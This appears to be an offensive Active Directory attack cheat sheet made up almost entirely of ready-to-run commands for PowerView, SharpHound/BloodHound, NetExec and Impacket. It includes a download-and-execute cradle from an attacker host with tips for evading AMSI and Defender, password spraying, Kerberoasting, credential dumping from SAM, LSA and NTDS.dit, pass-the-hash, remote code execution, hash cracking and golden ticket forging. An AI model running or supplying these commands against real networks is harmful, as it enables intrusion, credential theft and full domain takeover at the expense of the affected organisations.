Internal Reconnaissance & Domain Enumeration
#PowerView
#Loading Module
## Load from disk (avoid if possible, drops artifact)
Import-Module .\PowerView.ps1
# In-memory load with AMSI awareness
# Note: Plain downloads are often caught by AMSI/Defender
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://<ATTACKER_IP>/PowerView.ps1')
# Better: Use obfuscated or renamed version
IEX (New-Object Net.WebClient).DownloadString('https://<ATTACKER_IP>/Invoke-Recon.ps1')
# Alternative: Load from Base64 encoded string (bypasses some detection)
$code = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('BASE64_POWERVIEW'))
IEX $code
# Best OPSEC: Use native AD cmdlets where possible (covered below)
Domain & Policy Information
## Basic domain enumeration
Get-NetDomain
Get-NetDomainController
Get-DomainPolicy
# More detailed DC information
Get-NetDomainController | Select-Object Name, IPAddress, OSVersion, Forest
# Domain trust relationships (critical for lateral movement)
Get-NetDomainTrust
Get-NetForestDomain
# Domain password policy (useful for password spraying)
(Get-DomainPolicy)."System Access"
# Kerberos policy
(Get-DomainPolicy)."Kerberos Policy"
User & Group Enumeration
## Basic user enumeration (noisy, returns all users)
Get-NetUser | Select-Object samaccountname, description, admincount
# Specific user with all properties
Get-NetUser -Identity <USERNAME> -Properties *
# High-value targets: users with AdminCount=1
Get-NetUser -AdminCount | Select-Object samaccountname, lastlogon, pwdlastset
# Users with SPN (Kerberoastable)
Get-NetUser -SPN | Select-Object samaccountname, serviceprincipalname
# Users with passwords that don't expire
Get-NetUser -Properties samaccountname,useraccountcontrol | Where-Object {$_.useraccountcontrol -band 0x10000}
# Users with delegation enabled (potential privilege escalation)
Get-NetUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto
# Domain Admins and nested members
Get-NetGroup "Domain Admins" -FullData
Get-NetGroupMember -Identity "Domain Admins" -Recurse
# Privileged groups enumeration
@("Domain Admins", "Enterprise Admins", "Administrators", "Account Operators", "Backup Operators") | ForEach-Object {
Get-NetGroupMember -Identity $_ -Recurse
}
Computer & Share Enumeration
## Enumerate domain computers
Get-NetComputer | Select-Object samaccountname, operatingsystem, lastlogon
# Servers only (often more valuable targets)
Get-NetComputer -OperatingSystem "*Server*" | Select-Object samaccountname, operatingsystem
# Computers with unconstrained delegation (high-value targets)
Get-NetComputer -Unconstrained | Select-Object samaccountname
# Enumerate accessible shares (can be slow and noisy)
Find-DomainShare -Verbose -CheckShareAccess
# Find interesting files in shares
Find-InterestingDomainShareFile -Include *.txt, *.xml, *.ps1, *.bat, *.config, *.xls*, *.doc*, *password*, *cred*
# Enumerate local admin access (very noisy)
Find-LocalAdminAccess -Verbose
ACL & Trust Enumeration
## Enumerate ACLs for specific user (look for interesting permissions)
Get-ObjectAcl -SamAccountName <USERNAME> -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "GenericAll|Write|Create|Delete"}
# Find interesting ACLs (potential privilege escalation paths)
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -match "Domain Users|Authenticated Users"}
# Domain and forest trusts (lateral movement opportunities)
Get-NetDomainTrust -Domain <DOMAIN>
Get-NetForestTrust
# Find GPOs
Get-NetGPO | Select-Object displayname, whenchanged
# Find computers where specific user has admin rights
Find-GPOComputerAdmin -UserName <USERNAME>
Modern Alternative: Native AD PowerShell
## These generate less suspicion (built-in Microsoft cmdlets)
Import-Module ActiveDirectory
# Domain info
Get-ADDomain
Get-ADForest
(Get-ADDomain).DomainMode
# User enumeration
Get-ADUser -Filter * -Properties * | Select-Object SamAccountName, Description, AdminCount, LastLogonDate
Get-ADUser -Filter {AdminCount -eq 1} -Properties SamAccountName
# Group enumeration
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADGroup -Filter {AdminCount -eq 1}
# Computer enumeration
Get-ADComputer -Filter * -Properties OperatingSystem, LastLogonDate
# Trust enumeration
Get-ADTrust -Filter *
BloodHound
#SharpHound Data Collection (Windows)
## Standard collection (all data)
.\SharpHound.exe -c All -d <DOMAIN_FQDN> --zipfilename bloodhound_data.zip
# Stealth collection (slower, less noisy, skips session enumeration)
.\SharpHound.exe -c All -d <DOMAIN_FQDN> --Stealth --zipfilename bloodhound_stealth.zip
# With explicit credentials
.\SharpHound.exe -c All --domain <DOMAIN> --ldapusername <USER> --ldappassword <PASS>
# Specific collection methods (reduce noise)
.\SharpHound.exe -c DCOnly -d <DOMAIN_FQDN> # DC data only (least noisy)
.\SharpHound.exe -c Session,LoggedOn -d <DOMAIN_FQDN> # Session data only
.\SharpHound.exe -c Group,LocalAdmin,Session,Trusts -d <DOMAIN_FQDN> # Common subset
# Loop collection for session data over time (capture admin logins)
.\SharpHound.exe -c Session --Loop --LoopDuration 02:00:00 --LoopInterval 00:10:00
# Specify output directory
.\SharpHound.exe -c All --OutputDirectory C:\temp --OutputPrefix corp_enum
# Exclude DCs from session enumeration (better OPSEC)
.\SharpHound.exe -c All --ExcludeDCs --zipfilename bloodhound.zip
# JSON output (for BloodHound 5.x)
.\SharpHound.exe -c All --outputdirectory C:\temp --outputprefix bh --jsonoutput
BloodHound(Linux)
## Standard collection with password
bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN_FQDN> -ns <DC_IP> -c all --zip
# With NTLM hash (pass-the-hash)
bloodhound-python -u <USERNAME> -hashes :<NT_HASH> -d <DOMAIN_FQDN> -ns <DC_IP> -c all --zip
# Kerberos authentication (stealthier if you have valid ticket)
bloodhound-python -u <USERNAME> -k -d <DOMAIN_FQDN> -ns <DC_IP> -c all --zip
# Specific collectors only
bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN_FQDN> -ns <DC_IP> -c DCOnly --zip
# Custom output filename
bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN_FQDN> -ns <DC_IP> -c all --zip -o bloodhound_output
# LDAPS (encrypted, better OPSEC on monitored networks)
bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN_FQDN> -ns <DC_IP> -c all --use-ldaps --zip
Analysis
## Start Neo4j database (required backend)
sudo neo4j console
# Or as service
sudo systemctl start neo4j
# Default credentials: neo4j/neo4j (change on first login)
# Web interface: http://localhost:7474
# Launch BloodHound (legacy version)
./BloodHound --no-sandbox
# BloodHound CE (Community Edition - Docker)
docker-compose -f docker-compose.yml up
# Access at http://localhost:8080
Key Queries
## After uploading data, run these queries:
# Shortest paths to Domain Admins
MATCH (n:User), (m:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}), p=shortestPath((n)-[*1..]->(m)) RETURN p
# Find Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u
# Find AS-REP Roastable users
MATCH (u:User {dontreqpreauth:true}) RETURN u
# Find computers with unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
# Find users with DCSync rights
MATCH (n1)-[:MemberOf|GetChanges*1..]->(u:Domain {name:"DOMAIN.LOCAL"}) RETURN n1
# Owned principals to Domain Admins
MATCH (n {owned:true}), (m:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}), p=shortestPath((n)-[*1..]->(m)) RETURN p
NetExec (nxc)
#Basic Authentication
## SMB authentication with password
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>'
# Multiple targets (CIDR, range, file)
nxc smb 192.168.1.0/24 -d <DOMAIN> -u <USER> -p '<PASSWORD>'
nxc smb 192.168.1.1-50 -d <DOMAIN> -u <USER> -p '<PASSWORD>'
nxc smb targets.txt -d <DOMAIN> -u <USER> -p '<PASSWORD>'
# Pass-the-hash
nxc smb <TARGET> -d <DOMAIN> -u <USER> -H <NT_HASH>
nxc smb <TARGET> -d <DOMAIN> -u <USER> -H <LM_HASH>:<NT_HASH>
# Local authentication (SAM database)
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --local-auth
# Null session (rare, but worth trying)
nxc smb <TARGET> -u '' -p ''
# Guest authentication
nxc smb <TARGET> -u 'guest' -p ''
Enumeration
## Enumerate logged-on users
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --loggedon-users
# Enumerate domain users
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --users
# Enumerate domain groups
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --groups
# Enumerate local users
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --local-users
# Enumerate shares
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --shares
# Enumerate shares with read access check
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --shares --filter-shares READ
# Password policy (essential before password spraying)
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --pass-pol
# Check if user is local admin
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>'
# Look for (Pwn3d!) indicator
# Enumerate domain sessions
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --sessions
# RID brute force (enumerate users via RID cycling)
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --rid-brute
Credential Attacks
## Password spraying (use with caution - account lockout risk)
nxc smb <TARGETS> -d <DOMAIN> -u users.txt -p 'Password123' --continue-on-success
# Spray with delay to avoid lockout
nxc smb <TARGETS> -d <DOMAIN> -u users.txt -p 'Password123' --continue-on-success --delay 600
# ASREPRoast via NetExec
nxc ldap <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --asreproast asrep_output.txt
# Kerberoasting
nxc ldap <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --kerberoasting kerb_output.txt
# Dump SAM (requires local admin)
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --sam
# Dump LSA secrets
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --lsa
# Dump NTDS.dit (requires DA or equivalent)
nxc smb <DC_IP> -u <USER> -p '<PASSWORD>' --ntds
nxc smb <DC_IP> -u <USER> -p '<PASSWORD>' --ntds --user <SPECIFIC_USER>
Execution & Post-Exploitation
## Execute command
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -x 'whoami'
# Execute PowerShell command
nxc smb <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -X '$PSVersionTable'
# Upload and execute
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' --put-file /path/to/local/file C:\\Windows\\Temp\\file.exe --exec-method smbexec -x 'C:\\Windows\\Temp\\file.exe'
# Use specific execution method
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' -x 'whoami' --exec-method wmiexec
# Methods: wmiexec, atexec, smbexec, mmcexec
# Spider shares (find interesting files)
nxc smb <TARGET> -u <USER> -p '<PASSWORD>' -M spider_plus -o DOWNLOAD_FLAG=True
Protocol Modules
## LDAP enumeration
nxc ldap <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --users
nxc ldap <DC_IP> -d <DOMAIN> -u <USER> -p '<PASSWORD>' --groups
# WinRM
nxc winrm <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -x 'whoami'
# MSSQL
nxc mssql <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>' -q 'SELECT @@version'
# RDP (check access)
nxc rdp <TARGET> -d <DOMAIN> -u <USER> -p '<PASSWORD>'
Impacket Tools
#Kerberoasting with GetUserSPNs.py
## Basic Kerberoasting with password authentication
impacket-GetUserSPNs -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile kerberoast_hashes.txt
# With NTLM hash
impacket-GetUserSPNs -request -dc-ip <DC_IP> -hashes :<NT_HASH> <DOMAIN>/<USER> -outputfile kerberoast.txt
# Kerberos authentication (if you have valid TGT)
impacket-GetUserSPNs -request -k -no-pass -dc-ip <DC_IP> <DOMAIN>/<USER> -outputfile kerberoast.txt
# Request for specific user only
impacket-GetUserSPNs -request-user <TARGET_USER> -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>
# Crack with Hashcat (mode 13100 for TGS-REP)
hashcat -m 13100 kerberoast_hashes.txt /path/to/wordlist.txt -O
# Crack with rules
hashcat -m 13100 kerberoast_hashes.txt /path/to/wordlist.txt -r rules/best64.rule
# John the Ripper
john --wordlist=/path/to/wordlist.txt --format=krb5tgs kerberoast_hashes.txt
GetADUsers.py – Enumerate Domain Users
## Enumerate all domain users
impacket-GetADUsers -all -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>
# Save to file
impacket-GetADUsers -all -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> > domain_users.txt
# With NTLM hash
impacket-GetADUsers -all -dc-ip <DC_IP> -hashes :<NT_HASH> <DOMAIN>/<USER>
# Get specific attributes
impacket-GetADUsers -all -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -debug
Other Essential Impacket Tools
## secretsdump.py - Extract credentials from SAM/LSA/NTDS
# Local SAM dump (requires admin)
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
# Remote SAM dump
impacket-secretsdump <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
# NTDS.dit dump (DC credentials)
impacket-secretsdump -just-dc <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
# Extract specific user
impacket-secretsdump -just-dc-user <USERNAME> <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
# NTLM hashes only (faster)
impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
# psexec.py - Remote command execution
impacket-psexec <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
impacket-psexec -hashes :<NT_HASH> <DOMAIN>/<USER>@<TARGET>
# wmiexec.py - Stealthier execution via WMI
impacket-wmiexec <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
# smbexec.py - SMB-based execution
impacket-smbexec <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
# atexec.py - Schedule task for execution
impacket-atexec <DOMAIN>/<USER>:<PASSWORD>@<TARGET> 'whoami'
# lookupsid.py - RID cycling for user enumeration
impacket-lookupsid <DOMAIN>/<USER>:<PASSWORD>@<TARGET>
# GetNPUsers.py - AS-REP roasting (covered earlier but included for completeness)
impacket-GetNPUsers -dc-ip <DC_IP> <DOMAIN>/ -usersfile users.txt -format hashcat -no-pass
# getTGT.py - Request TGT (useful for Kerberos attacks)
impacket-getTGT <DOMAIN>/<USER>:<PASSWORD>
export KRB5CCNAME=<USER>.ccache
# ticketer.py - Create Golden/Silver tickets
impacket-ticketer -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <USERNAME>
